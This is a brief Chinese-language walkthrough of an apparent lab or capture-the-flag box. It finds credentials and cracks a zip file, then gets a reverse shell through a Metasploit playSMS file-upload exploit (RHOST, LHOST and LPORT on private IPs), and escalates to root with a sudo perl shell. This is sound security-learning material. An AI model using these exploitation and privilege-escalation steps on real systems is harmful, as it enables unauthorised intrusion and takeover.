一、主机发现
二、信息收集
1.访问首页
2.目录扫描
1)访问/robots
2)访问/nothing并查看源代码,应该都是密码
3)访问/secure,并下载
解压需要密码
尝试使用上文发现的密码爆破
使用freedom,解压成功
使用文本打开,发现目录/SecreTSMSgatwayLogin,及用户名touhid
4)拼接/SecreTSMSgatwayLogin
使用touhid:diana登录,登陆不成功就换个浏览器试试
3.搜索框架playsms漏洞
searchsploit playsms
cp /usr/share/exploitdb/exploits/php/webapps/42044.txt /home/kali
看42044文档,表示可以上传csv文档,利用文件上传漏洞改变参数拿权限
二、信息利用
1.输入
msfconsole
2.查找框架漏洞
search playsms
use 2
查看需要做什么配置
show options
进行配置
set PASSWORD diana
set USERNAME touhid
set TARGETURI SecreTSMSgatwayLogin
set RHOST 192.168.42.181
set LHOST 192.168.42.128
set LPORT 9797
输入run
拿到shell,输入shell
三、提权
1.输入sudo -l
2.找到辅助网站查看利用代码
3.输入
sudo perl -e 'exec "/bin/sh";'
4.提权成功